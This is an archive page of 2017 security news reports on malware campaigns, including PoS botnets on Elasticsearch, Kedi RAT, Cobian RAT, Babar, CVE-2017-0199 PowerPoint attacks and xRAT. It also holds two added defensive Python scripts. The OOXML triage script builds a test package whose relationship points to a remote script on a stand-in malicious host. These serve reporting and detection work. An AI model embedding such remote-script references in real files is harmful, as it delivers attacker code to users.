- Virus -

Last update 09.10.2017 13:47:12


Thousands of Elasticsearch installs compromised to host PoS Malware
15.9.2017 securityaffairs

Experts discovered 4,000 compromised installations on Amazon AWS of open source analytics and search tool Elasticsearch that were running PoS malware.
Security researchers from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

According to Kromtech, this is just a portion of the overall number of compromised servers. Expert Bob Diachenko from Kromtech reported those servers are just 27 per cent of a total of 15,000 unsecured Elasticsearch installations discovered by the firm, and 99 per cent of the infected servers are hosted on Amazon AWS.


Amazon Web Services provides customers with a free T2 micro (EC2 / Elastic Compute Cloud) instance with up to 10 Gb of disk space, but clearly, customers are not able to properly secure the installs.

The AWS offer only includes Elasticsearch versions 1.5.2 or 2.3.2, and unfortunately users skip all security configuration during the quick installation process. Because of the poor settings chosen by the operators, the malware runs with full administrative privileges on the compromised systems.

“The Amazon hosting platform gives users the possibility to configure the ElasticSearch cluster just in few clicks, but usually, people skip all security configuration during the quick installation process. This is where a simple mistake can have big repercussions and in this case it did by exposing a massive amount of sensitive data.” wrote Diachenko.

The company found command-and-control servers for Alina and JackPoS point-of-sale malware running on the compromised Elasticsearch installs.

Threat actors are managing a big POS Botnet with Command and Control (C&C) that collects credit card information stolen from payment systems.

“The lack of authentication allowed the installation of malware on the ElasticSearch servers. The public configuration allows the possibility of cyber criminals to manage the whole system with full administrative privileges. Once the malware is in place criminals could remotely access the server’s resources and even launch a code execution to steal or completely destroy any saved data the server contains.” continues Diachenko.

Below are the key findings of the research conducted by Kromtech:

There are different packages of C&C malware, i.e. servers were infected multiple times

Different packages can be related to different botnets (because POS malware was seen being sold not only on the Darknet but on public domains as well)

Many servers are infected; for the same package on different servers the time of infection can differ, because of periodic scans and the expansion of the botnets

Nearly 99% of infected servers are hosted on Amazon Web Services

52% of infected servers run Elastic Search 1.5.2 version, 47% – 2.3.2 version, and 1% for other versions.

Recent infections were made at the end of August 2017

Sysadmins must urgently check their Elasticsearch installs, analyze the connections and traffic, and check for the presence of the PoS malware. In case of compromised installs, they can provide the sample to Kromtech before reinstalling the systems and applying patches as required.
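The root cause described above is an Elasticsearch instance reachable from the Internet with no authentication. As an added example (not from the page, from Kromtech or from Elastic), here is a Python audit that takes the JSON shape returned by `aws ec2 describe-security-groups` and reports every security group that exposes the Elasticsearch HTTP port (9200) or transport port (9300) to the whole Internet; the group IDs and rules in `SAMPLE` are constructed data, not from the page.

```python
"""Audit AWS EC2 security groups for Elasticsearch ports open to the world.

Added example. The input follows the JSON layout of
`aws ec2 describe-security-groups`; SAMPLE below is constructed test data.
"""
import json
import sys

ES_PORTS = {9200, 9300}          # Elasticsearch HTTP API and transport ports
WORLD = {"0.0.0.0/0", "::/0"}    # "anywhere" CIDRs


def rule_covers_port(perm: dict, port: int) -> bool:
    """True if an IpPermissions entry admits traffic to `port` over TCP."""
    proto = perm.get("IpProtocol")
    if proto == "-1":            # all protocols, all ports
        return True
    if proto not in ("tcp", "6"):
        return False
    lo = perm.get("FromPort", 0)
    hi = perm.get("ToPort", 65535)
    return lo <= port <= hi


def rule_is_public(perm: dict) -> bool:
    """True if any IPv4 or IPv6 range on the rule is the whole Internet."""
    cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
    cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
    return any(c in WORLD for c in cidrs)


def exposed_groups(describe_output: dict) -> list:
    """Return sorted (GroupId, port) pairs where an ES port is world-reachable."""
    findings = set()
    for sg in describe_output.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            if not rule_is_public(perm):
                continue
            for port in ES_PORTS:
                if rule_covers_port(perm, port):
                    findings.add((sg["GroupId"], port))
    return sorted(findings)


# Constructed sample: one group opens 9200 to the world, one is private,
# one opens everything to the world.
SAMPLE = {"SecurityGroups": [
    {"GroupId": "sg-0000exposed", "GroupName": "es-quickstart", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 9200, "ToPort": 9200,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "203.0.113.0/24"}]}]},
    {"GroupId": "sg-0000private", "GroupName": "es-private", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 9200, "ToPort": 9300,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}]}]},
    {"GroupId": "sg-0000allopen", "GroupName": "anything", "IpPermissions": [
        {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
]}


if __name__ == "__main__":
    # Pass a file saved from `aws ec2 describe-security-groups` as argv[1],
    # otherwise the constructed SAMPLE is audited.
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE
    for group_id, port in exposed_groups(data):
        print(f"{group_id}: port {port} reachable from the Internet")
```

A group that opens 9200 only to a private range (the `sg-0000private` case) is not reported; the check is about exposure, not about whether authentication is configured on the node itself, which has to be verified separately.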

New Attack Abuses CDNs to Spread Malware

14.9.2017 securityweek Virus
Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.

The security firm analyzed the downAndExec standard, which makes extensive use of JS scripts and enables the download and execution of malware. In one attack, miscreants were observed using the standard and abusing CDNs to deliver banking threats to users in Brazil, the researchers reveal.

The attack chain starts with social engineering techniques being used to trick victims into executing a malicious application detected as NSIS/TrojanDropper.Agent.CL. This is a malware downloader designed to fetch a single snippet of externally-hosted JS necessary to supplement the execution process.

The JS snippet is hosted on the infrastructure of a CDN provider, which not only provides high bandwidth for payload delivery and command and control (C&C) operations, but also ensures that takedown attempts aren’t immediately successful, as it is impracticable to block the entire CDN domain.

Searching for indicators of compromise is also difficult in such cases, as the affected environments might have a large number of access records made by non-malicious software, the security researchers say.

After the content of said JS snippet is fetched, a function is called to add to the end of the JS snippet a string containing “downAndExec” and two parameters representing the URL where the C&C is hosted, and “x-id” data, which is necessary to download other payloads.

The researchers also discovered that in addition to obfuscation, protection against sandboxing has been implemented as well. Thus, the malicious code isn’t executed if the JS snippet is analyzed separately. Moreover, the script performs a series of checks before executing malicious functions, to make sure that the target machine is of potential interest.

The malware checks for various files, after which it starts looking for folders associated with banking programs such as Bradesco, Itaú, Sicoob and Santander. The researchers suggest that this check is probably intended to prevent activation of malicious functions on computers that are not used for online banking.

Finally, the malware also checks whether the target computer is located in Brazil. This shows that the attack is targeted and might also be meant to avoid analysis. The snippet verifies that the customer IP is from a Brazilian AS (autonomous system).

Should the computer meet all conditions, the malware initiates communication with the C&C, which results in the final compromise being performed. In the analyzed incident, the malware downloaded three files, one of which is a banking Trojan.

“As we have seen, the downAndExec technique involves two download stages and several protections, either to identify machines matching the desired profile, or to distribute malicious code in ‘sterile’ sections, which on their own do not execute (in order to bypass online protections), but which, when joined with other pieces of malicious code, are capable of compromising a victim’s computers,” ESET concludes.

New Kedi RAT Uses Gmail to Exfiltrate Data

13.9.2017 securityweek  Virus
Kedi RAT Pretends to be a Citrix Utility, Transfers Data Using Gmail

A newly discovered remote access Trojan (RAT) capable of evading security scanners communicates with its command and control (C&C) server via Gmail, Sophos has discovered.

Dubbed Kedi, the RAT was designed to steal data and is being spread via spear-phishing emails, the security researchers say. The observed attacks appear targeted with the malicious payload masquerading as a Citrix utility.

The RAT’s capabilities aren’t out of the ordinary: AntiVM/anti-sandbox features, the ability to extract and run embedded secondary payloads, file download/upload backdoors, screenshot grabbing, keylogging, and the ability to extract usernames, computer names, and domains. According to Sophos, most of these features are command-driven.

What makes the Trojan stand out from the crowd, however, is its ability to communicate with its C&C using Gmail (the Basic HTML version). Nonetheless, the malware can also talk to the server using DNS and HTTPS requests, the security researchers have discovered.

“Using Gmail to receive instructions from its C&C, Kedi navigates to the inbox, finds the last unread message, grabs content from message body and parses commands from this content. To send information back to command and control, base64 encodes the message data, replies to the received message, adds encoded message data and sends its message,” Sophos reveals.

The spear-phishing attack distributing the threat was observed last week. While Kedi doesn’t appear to have been involved in a widespread campaign to date, it could end up targeting more users soon, Sophos warns.

To stay protected, users should pay close attention when clicking on links or opening files they receive via email from unknown sources. Users are also advised to keep operating systems and applications up to date at all times, as well as to use and maintain an anti-virus application.

Linux Malware Could Run Undetected on Windows: Researchers

13.9.2017 securityweek Virus
A new Windows 10 feature that makes the popular Linux bash terminal available for Microsoft’s operating system could allow for more malware families to target the operating system, Check Point researchers claim.

Called Windows Subsystem for Linux (WSL), the feature exited beta a couple of months ago and is set to become available to all users in the upcoming Windows 10 Fall Creators Update (FCU), set to be released by Microsoft in October 2017.

The feature brings the Linux command-line shell to Windows, thus allowing users to natively run Linux applications on Windows systems. Because of that, Check Point researchers argue, malware designed for Linux can slip undetected onto Windows computers.

Called Bashware, the new attack technique could be abused even by known Linux malware, because anti-malware solutions for Windows haven’t been configured to detect such threats, the security researchers argue.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time. This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms,” Check Point says.

The security researchers claim they have already tested the attack technique on “most of the leading anti-virus and security products on the market,” and managed to successfully bypass all of them. Because of that, they claim, “Bashware may potentially affect any of the 400 million computers currently running Windows 10 PC globally.”

The risks posed by WSL, however, are mitigated by the fact that the user needs to manually enable the feature and reboot the system. Malware that wants to abuse the feature would need to enable developer mode on Windows, which is disabled by default, and even download and extract the Linux file system from Microsoft’s servers.

Check Point says the necessary features could be silently enabled in the background, thus setting up the necessary environment without the user's knowledge. Moreover, they say they were able to run Windows-based malware in the newly set up environment.

The researchers also point out that the newly discovered attack technique doesn’t leverage an implementation flaw, but that the lack of awareness by various security vendors is the actual issue here.

“However, we believe that it is both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware,” Check Point says.

According to Microsoft, however, the risks posed by such an attack are low, given that the features required to run Linux apps on Windows are disabled by default.

“We reviewed and assessed this to be of low risk. One would have to enable developer mode, then install the component, reboot, and install Windows Subsystem for Linux in order for this to be effective. Developer mode is not enabled by default,” a Microsoft spokesperson told SecurityWeek via email.

Contacted by SecurityWeek, anti-malware vendor Kaspersky Lab confirmed in an emailed statement that they are aware of the potential risks posed by WSL and that they are already working on the technology necessary to detect any malware that could abuse it.

“Kaspersky Lab is aware of the possibility to create malware for Windows Subsystem for Linux (WSL) and is working on technologies to detect this type of malware on user devices. In fact, in 2018, all Kaspersky Lab solutions for Windows will be updated with special technologies that detect behaviorally and heuristically and block any Linux and Windows threats when WSL mode is on. Currently, all Kaspersky Lab frontline solutions for Windows can detect downloaders and Windows parts of Linux malware,” Kaspersky Lab said.

SentinelOne Enables IOC Search and Threat Hunting for Endpoints

8.9.2017 securityweek Virus
SentinelOne Launches Deep Visibility Module to Discover Indicators of Compromise (IOCs) on Endpoints

Malware increasingly uses encryption to hide its activities. If defenders cannot see what is inside encrypted traffic, they can have no idea of whether it is malicious or benign. Since more than half, and growing, of all traffic is now encrypted, it is increasingly important for defenders to gain visibility into that traffic.

Next-gen AI-powered endpoint protection and response firm SentinelOne yesterday launched a new module to provide that visibility. Called Deep Visibility, it uses the kernel hooks already present in the SentinelOne Endpoint Protection Platform to see the cleartext traffic at the point of encryption, and again at the point of decryption. Detecting the presence of malware through recognition of malicious encrypted traffic then allows the security team to pivot to the response part of the SentinelOne platform and take remedial action.

Rajiv Raghunarayan, SentinelOne's VP of product marketing, told SecurityWeek that this approach was taken to avoid adding overhead to the endpoints. "Our kernel hooks give us the ability to extract the traffic at the point of encryption or at the point of decryption. This does not require any additional agent on the endpoint -- the hooks already exist as part of our base engine; we do not need any additional processing."

The SentinelOne view is that security -- combining endpoint protection and response -- is all about visibility to first see the threats and then be able to respond to them. "We started out with a base engine that looks at threats from a prevention and detection and response perspective: prevent when we can; detect where we can't (for example, any fileless threats that get through prevention such as the recent WannaCry and NotPetya worms)," said Raghunarayan.

But how do you detect/protect against threats that are sometimes only detectable at the point of execution?

"Here we observe malicious characteristics on execution. All of this is based on AI technology that examines behavior -- file characteristics, process execution characteristics, registry, pages, memory etcetera," Raghunarayan said. "Finally, we pivot from detection to response -- I've detected a threat but now I need to respond to it. I can't allow ransomware to start encrypting my files just because there's no-one available to respond to the alert. So, we can contain the system automatically: we could quarantine the system or the file; we could kill the process; we could remediate (undo the changes caused by the malware), or we could roll back the system to a known previous good state."

But encryption remains a blind spot and a weakness for most defenses. This is the issue tackled by the firm's new Deep Visibility module.

The traditional route for seeing into encrypted traffic is to decrypt it at a firewall and examine it there in a sort of benign man-in-the-middle attack. "We don't need some form of man-in-the-middle decryption to see what is happening," said Raghunarayan. "If decryption is done at the firewall, the performance of both the firewall and the endpoint is impacted -- and one thing you must never do at the endpoint is drop its performance."

By using SentinelOne's existing endpoint protection and response engine, the firm has increased security analysts' view into potential threats without requiring an additional agent on the endpoint. "We did need to do extra work to be able to see into Chrome's own proprietary encryption/decryption engines; but the result allows us complete visibility into the endpoint."

"We are bringing visibility into every edge of the network -- from the endpoint to the cloud," said Tomer Weingarten, CEO of SentinelOne. "Deep Visibility enables search capabilities and visibility into all traffic, since we see it at the source and monitor it from the core. We know that more than half of all traffic is encrypted -- including malicious traffic -- which makes a direct line of sight into all traffic an imperative ingredient in enterprise defense."

The user can pivot from this deeper visibility into the response part of the SentinelOne engine. "If endpoints are seen displaying worrying characteristics, the security analyst can either immediately stop those endpoints from connecting to the network to spread an infection; or just roll back the endpoints if they display ransomware characteristics. The whole purpose is to provide the analysts with extra insight -- it helps with both IOC searching and also threat hunting," added Raghunarayan.

The Dridex banking trojan is a good example of the need for this extra visibility, since it makes extensive use of encryption -- including encrypting the data it exfiltrates. While existing security may be able to detect the presence of Dridex, simply blocking or removing it may be too late. Without visibility into the data that has been exfiltrated, the analysts may miss continuing threats. For example, if Dridex has already stolen and exfiltrated credentials, the analysts need to know which credentials have been lost.

"Deep Visibility is a breakthrough that will re-define how we think about perimeters," said Weingarten. "Gaining visibility into the data pathways marks the first milestone for a real, software-defined edge network that can span through physical perimeters, to hybrid datacenters and cloud services."

SentinelOne raised $70 million in a Series C funding round in January 2017.

Hackers Are Distributing Backdoored 'Cobian RAT' Hacking tool For Free
7.9.2017 thehackernews

Nothing is free in this world.
If you are searching for free ready-made hacking tools on the Internet, then beware—most freely available tools, claiming to be the swiss army knife for hackers, are nothing but a hoax.
Last year, we reported about one such Facebook hacking tool that actually had the capability to hack a Facebook account, but yours and not the one you desire to hack.
Now, a Remote Access Trojan (RAT) builder kit that was recently spotted for free on multiple underground hacking forums was found to contain a backdoored module that aims to provide the kit's authors access to all of the victims' data.
Dubbed Cobian RAT, the malware has been in circulation since February of this year and has some similarities with the njRAT and H-Worm family of malware, which has been around since at least 2013.
According to ThreatLabZ researchers from Zscaler, who discovered the backdoored nature of the malware kit, the "free malware builder" is likely capable of allowing other wannabe hackers to build their own versions of the Cobian RAT with relative ease.
Once the criminals create their own version of the malware using this free builder, they can then effectively distribute it via compromised websites or traditional spam campaigns to victims all over the world and recruit the affected devices into a malicious botnet.
The Cobian RAT then steals data on the compromised system, with the capability to log keystrokes, take screenshots, record audio and webcam video, install and uninstall programs, execute shell commands, use dynamic plug-ins, and manage files.
Cyber Criminals Want to Hack Wannabe Hackers
Now, if you get excited by knowing that all these capabilities offered by the original authors of the malware builder kit are free as they claim, you are mistaken.
Unfortunately, the custom RATs created using this free Cobian RAT malware builder kit have a hidden backdoor module, which silently connects to a Pastebin URL that serves as the kit authors' command-and-control (C&C) infrastructure.
The backdoor, at any time, can be used by the original authors of the kit to issue commands to all RATs built on the top of their platform, eventually putting both wannabe hackers and compromised systems infected by them at risk.
"It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author," Deepen Desai, senior director of security research at Zscaler, wrote in a blog post published Thursday.
"The original author is essentially using a crowdsourced model for building a mega Botnet that leverages the second level operators Botnet."
The researchers also explain that the original Cobian developer is "relying on second-level operators to build the RAT payload and spread infections."
The original author then can take full control of all the compromised systems across all the Cobian RAT botnets, thanks to the backdoor module. They can even remove the second-level operators by changing the C&C server information configured by them.
A recently observed unique Cobian RAT payload by the researchers reportedly came from a Pakistan-based defence and telecommunication solution website (that was potentially compromised) and served inside a .zip archive masquerading as an MS Excel spreadsheet.
The bottom line: examine free online tools very carefully before using them.

Experts Find 2007 Variant of Malware Linked to French Intelligence

7.9.2017 securityweek  Virus
Researchers at Palo Alto Networks have come across a 2007 variant of Babar, a piece of malware believed to have been developed by a French intelligence agency.

The activities of the cyber espionage group known as the Animal Farm came to light in March 2014, when a French publication released a series of slides from Edward Snowden. The slides belonged to Canada's Communications Security Establishment (CSE) and they detailed an espionage campaign dubbed “Operation Snowglobe.”

Further analysis by various security firms revealed that the Animal Farm group had been using several pieces of malware whose names have been inspired by cartoon characters, including Babar, Dino, Casper and Bunny. Other malware families used by the threat actor are NBot and Tafacalou.

The group, previously believed to have been active since at least 2009, has targeted government organizations, military contractors, private firms, media companies, activists, and humanitarian aid organizations in many countries around the world.

Back in 2015, Kaspersky mentioned that it had found evidence of some Animal Farm malware being developed as far back as 2007, but the company did not share any details. Palo Alto Networks now says it has found a 2007 version of Babar, also known as Snowball. Researchers pointed out that the previously analyzed samples of this malware had dated back to 2011.

“Analysing historical malware samples helps us learn about its set of features and technical capabilities. This helps us compare a tool used by one adversary to that used by similar adversaries at that time,” Palo Alto’s Dominik Reichel said in a blog post.

Researchers analyzed a loader with a compilation timestamp of 11/09/2007 11:37:36 PM and a payload apparently compiled 10 seconds later. While timestamps can be modified, experts believe these are genuine.

This version of Babar was capable of obtaining information about the compromised machine, rebooting or shutting down the infected system, downloading files, and killing arbitrary processes. When obtaining information on the default Web browser, the malware uses a method that does not work on Chrome, which Google released in 2008, further indicating that the samples were truly developed in 2007.

Researchers also pointed out that the malware had abused the official website of the Permanent Council of Accounting of the Democratic Republic of the Congo (cpcc-rdc.org) for command and control (C&C) communications.

Experts also found a design flaw that resulted in configuration data that should have been encrypted to be accessible in clear text, which is surprising considering that the malware was developed by a sophisticated actor.

Code and structure analysis suggests that the Casper malware used by Animal Farm is based on this version of Babar.

Overall, Palo Alto Networks believes this piece of malware is “only average” compared to other malware created at that time by threat groups believed to be backed by nation states, such as Regin or Careto.

The theory that a French intelligence agency is behind the Animal Farm is based on information from the CSE slides, the targeted entities, language and regional settings, and various strings found in the malware code. Palo Alto Networks’ analysis also found that the loader and the main payload for the 2007 version of Babar had the resource language ID set to 1036, which corresponds to French.

Targeted Attacks Leverage PowerPoint File for Malware Delivery

7.9.2017 securityweek  Virus

Threat actors are leveraging malicious PowerPoint files and a recently patched Microsoft Office vulnerability to target UN agencies, foreign ministries, international organizations, and entities interacting with international governments, Fortinet warns.

The attack uses a file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx and exploits the CVE-2017-0199 vulnerability that Microsoft addressed in April, after malicious actors had been abusing it to deliver malware such as Dridex, WingBird, Latentbot and Godzilla. The exploit has been and continues to be used in attacks even after patching.

Last month, the first PowerPoint attacks to exploit CVE-2017-0199 for malware delivery emerged, associated with the distribution of a Trojanized version of the REMCOS legitimate and customizable remote access tool (RAT).

Once the PowerPoint Slide Show is opened, it triggers a script and the exploit downloads remote code from an XML file with JavaScript code from the domain narrowbabwe[.]net. Next, it executes the code using the PowerPoint Show animations feature, Fortinet explains.

The exploit is also able to bypass the User Account Control feature in Windows, by hijacking the registry and then executing eventvwr.exe. The bypass technique was first detailed in August 2016.

The JavaScript inside the XML file would write a file in a directory, masquerading as a legitimate Microsoft Office patch. This, however, is a piece of malware executed with high privilege, which uses WMI ActiveScriptConsumers for persistence. Courtesy of a timer event, the script runs every 12 seconds.

The script also tries to identify if it runs in a virtual environment. If it doesn’t detect a virtual machine, the script proceeds to sending some data to a remote server.

Although the command and control (C&C) server had already been taken down at the time of analysis, the researchers say that the response from the C&C contains arbitrary commands executed with the eval() function. After executing the commands, the script sends a notification to the server.

“These commands can possibly be download functions to deliver the final payload, and the most commonly used malware for espionage are RATs (Remote Access Trojans),” Fortinet suggests.

Last month, Cisco discovered that attackers were combining Office exploits to avoid detection and ensure a higher delivery rate. Fortinet’s new report shows that actors can implement multiple techniques in a single piece of code to evade detection, bypass protections, and escalate privileges. The use of multiple embedded encoded scripts, multiple stages of URL connection, and the embedding of C&C URLs in a jpg file reveal the work of persistent criminals.
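A .ppsx file is a zip archive of XML parts, and a document that reaches out to a remote host when opened has to reference that host somewhere in the package. As an added example, not part of the Fortinet report or of this page, here is a Python check that lists every external relationship target inside an OOXML package and flags those whose scheme is not an ordinary http(s) or mailto link. It assumes, as public analyses of CVE-2017-0199 document abuse generally describe, that the remote reference is carried by a relationship with TargetMode="External"; the package built by `build_sample` is a constructed minimal stand-in for triage testing, not the sample from the page.

```python
"""Triage an OOXML package (pptx/ppsx/docx/xlsx) for external relationships.

Added example. It assumes the remote reference of a CVE-2017-0199-style
document lives in a *.rels part with TargetMode="External". The package
produced by build_sample() is constructed test data.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
SAFE_SCHEMES = ("http", "https", "mailto")


def external_targets(package: bytes) -> list:
    """Return (rels_part, Target, Type) for every external relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Target", ""), rel.get("Type", "")))
    return found


def suspicious(targets: list) -> list:
    """Keep external targets whose URL scheme is not a plain web/mail link.

    A target such as "script:http://host/file" has scheme "script", which an
    ordinary hyperlink never needs; "file:" or "mhtml:" are caught the same way.
    """
    return [t for t in targets
            if urlsplit(t[1]).scheme.lower() not in SAFE_SCHEMES]


def build_sample(target: str) -> bytes:
    """Build a minimal constructed package with one external relationship."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.'
                   'openxmlformats.org/package/2006/content-types"/>')
        z.writestr("ppt/slides/slide1.xml", "<sld/>")
        z.writestr(
            "ppt/slides/_rels/slide1.xml.rels",
            f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            f'officeDocument/2006/relationships/slideLayout" '
            f'Target="../slideLayouts/slideLayout1.xml"/>'
            f'<Relationship Id="rId2" Type="{HYPERLINK}" '
            f'Target="{target}" TargetMode="External"/>'
            f'</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_sample("script:http://malicious.invalid/logo.doc")  # constructed
    for part, target, _ in suspicious(external_targets(data)):
        print(f"{part}: suspicious external target {target}")
```

Run it against a quarantined file with the path as the first argument; with no argument it triages the constructed package. The scheme check is deliberately simple: an ordinary external hyperlink survives it, while a relationship whose target carries a non-web scheme is worth a manual look regardless of which part it sits in.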

Lenovo Settles FTC Charges Over Superfish Adware

6.9.2017 securityweek Virus
Lenovo has reached a settlement with the U.S. Federal Trade Commission (FTC) and Attorneys General in 32 states regarding the company’s decision to preinstall man-in-the-middle (MitM) software on its laptops.

The proposed settlement is subject to public comment until October 5, but if made final, Lenovo will not have to pay any fine. Instead, the company will be prohibited from misrepresenting the features of preloaded software that injects ads into browsing sessions or sends sensitive user data to third parties.

Lenovo is also required to obtain affirmative consent before activating such software, and it must maintain a comprehensive security program for preinstalled applications for a period of 20 years. This program will be subject to third-party audits.

The FTC filed a complaint against Lenovo back in 2015, after security experts discovered that a browser add-on named WindowShopper (VisualDiscovery) from Superfish had been injecting ads into web pages visited by Lenovo laptop owners by using a local proxy and a self-signed root certificate. The application was reportedly installed on hundreds of thousands of laptops in late 2014 and early 2015.

The application basically launched an MitM attack on users’ browsing sessions, allowing it to intercept sensitive information transmitted over the Web. Experts also raised concerns that by replacing legitimate certificates with its own, the Superfish software exposed users to malicious websites that leveraged fake certificates.

The FTC accused Lenovo of failing to inform users that the software acted as an MitM component, activating the software without adequate notice or informed consent, and failing to take measures to assess and address the security risks introduced by the application.

“While Lenovo disagrees with allegations contained in these complaints, we are pleased to bring this matter to a close after 2-1/2 years,” Lenovo said in a statement posted on its website.

“After learning of the issues, in early 2015 Lenovo stopped preloading VisualDiscovery and worked with antivirus software providers to disable and remove this software from existing PCs,” the company said. “To date, we are not aware of any actual instances of a third party exploiting the vulnerabilities to gain access to a user’s communications. Subsequent to this incident, Lenovo introduced both a policy to limit the amount of pre-installed software it loads on its PCs, and comprehensive security and privacy review processes, actions which are largely consistent with the actions we agreed to take in the settlements announced today.”

While members of the FTC unanimously accepted the agreement, Commissioner Terrell McSweeny issued a separate statement pointing out that the agency should have also added a charge related to Lenovo deceptively omitting that the software would alter users’ Internet experience. FTC Acting Chairman Maureen K. Ohlhausen does not agree with McSweeny’s view.

Autodesk A360 Drive Used to Spread Malware

6.9.2017 securityweek Virus
Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Functioning in a manner similar to that of cloud storage services such as Google Drive, A360 Drive allows a user to create an account for free and benefit from 5 gigabytes of storage space. The service is part of the Autodesk A360 cloud-based workspace, which allows design and engineering teams to share information to desktops, web, and mobile devices.

On A360 Drive, anyone can upload documents via a browser or desktop, and can also share these files by inviting people to view or edit them. Thus, all that a cybercriminal needs to do to abuse the service is to create an account, upload malicious content, and then embed URLs to this content in the chosen entry vector.

In fact, this is exactly what Trend Micro discovered has happened. Miscreants uploaded a plethora of malware to A360 Drive and started spreading it via macro-enabled Microsoft Word documents and other types of files.

One A360 Drive-hosted archive, the security firm says, included an executable (.EXE) file embedded with an obfuscated Visual Basic file hiding a Zeus/Zbot KINS variant beneath. One Java ARchive (JAR) file discovered on the platform contained an executable file archive that pointed to a variant of the NETWIRE remote access tool.

Another JAR file was found to be a variant of jRAT/Adwind, a piece of malware that can retrieve and exfiltrate a variety of data, including credentials, keystrokes, and multimedia files.

According to Trend Micro, some of the files were hosted via A360 Drive since June 2017, but the practice only surged in August. These files usually contained remote access tools, either obfuscated EXE files or Java archives, and haven’t been used in targeted attacks to date.

When it comes to the global distribution of the observed malware, the U.S., South Africa, France, Italy, Germany, Hong Kong, and Austria emerge as the most affected countries.

One of the analyzed files was an Office DOC document called AMMO REQUEST MOD Turkey.doc, which was uploaded to VirusTotal on August 24 and was distributed during the same period. Malicious macros included in the document were pointing to a PowerShell script designed to download a file from A360 Drive and execute it.

The downloaded payload, a Visual Basic obfuscated executable file, was found to be the Trojanized version of the Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. The malware was being distributed mainly in European countries such as Croatia, Germany, Greece, and Turkey.

Remcos made headlines in February, but it has been used in attacks since 2016. Recently, the RAT has been distributed via a malicious PowerPoint slideshow embedded with an exploit for CVE-2017-0199. In March, the same tool was found on endpoints infected with the MajikPOS point-of-sale (PoS) malware. Apparently, it was used as MajikPOS’s entry point.

“Securing the use of legitimate system administration tools like PowerShell helps mitigate threats and restrict them from being abused. Cloud-based storage platforms are known for being abused, too, and its misuse often allows malicious artifacts into the workplace’s machines. This can be prevented by ensuring that web traffic is scanned within the enterprise,” Trend Micro notes.

The security firm informed Autodesk of its findings and says they have been working together in taking “down the abused URLs and deploying additional countermeasures to prevent further abuse of A360 Drive.”

Experts discover a new sophisticated malware dubbed xRAT tied to mRAT threat
6.9.2017 securityaffairs

Researchers at Lookout spotted a new mobile remote access Trojan dubbed xRAT tied to the 2014 “Xsser / mRAT” surveillance campaign against Hong Kong protesters.
A new mobile remote access Trojan dubbed xRAT appears to be the evolution of the high-profile Xsser / mRAT spyware, which was first spotted in late 2014 when it was used in a surveillance campaign against Hong Kong protesters.

“Lookout researchers have identified a mobile trojan called xRAT with extensive data collection functionality and the ability to remotely run a suicide function to avoid detection. The malware is associated with the high-profile Xsser / mRAT malware, which made headlines after targeting both iOS and Android devices of pro-democracy Hong Kong activists in late 2014.” reads the analysis published by Lookout.

xRAT has many similarities with mRAT: it has the same code structure and uses the same decryption key. The analysis of the code also revealed that both families share the same naming conventions, which suggests both malicious codes were developed by the same threat actor.


According to researchers from security firm Lookout, the command and control (C&C) servers used for the xRAT malware are the same ones used by a Windows malware, a circumstance that suggests the threat actor is composed of experienced operators.

The xRAT mobile Trojan seems to be specifically developed to target political groups. It includes detection evasion and implements common spying features, including the ability to gather data from instant messaging applications such as WeChat and QQ.

“Like mRAT, xRAT supports an impressive set of capabilities that include flexible reconnaissance and information gathering, detection evasion, specific checks for antivirus, app and file deletion functionality, and other functionality listed below. It also searches for data belonging to popular communications apps like QQ and WeChat. The threat actors themselves are able to remotely control much of its functionality in real time (e.g., which files to retrieve and what the settings of its automatic file retrieval module should be). ” continues the analysis.

Below is the complete list of features implemented by the xRAT mobile malware.

Browser history
Device metadata (such as model, manufacturer, SIM number, and device ID)
Text messages
Call logs
Data from QQ and WeChat
Wifi access points a device has connected to and the associated passwords
Email database and any email account username / passwords
Device geolocation
Installed apps, identifying both user and system applications
SIM Card information
Provide a remote attacker with a shell
Download attacker specified files and save them to specified locations
Delete attacker specified files or recursively delete specified directories
Enable airplane mode
List all files and directories on external storage
List the contents of attacker specified directories
Automatically retrieve files that are of an attacker specified type that are between a minimum and maximum size
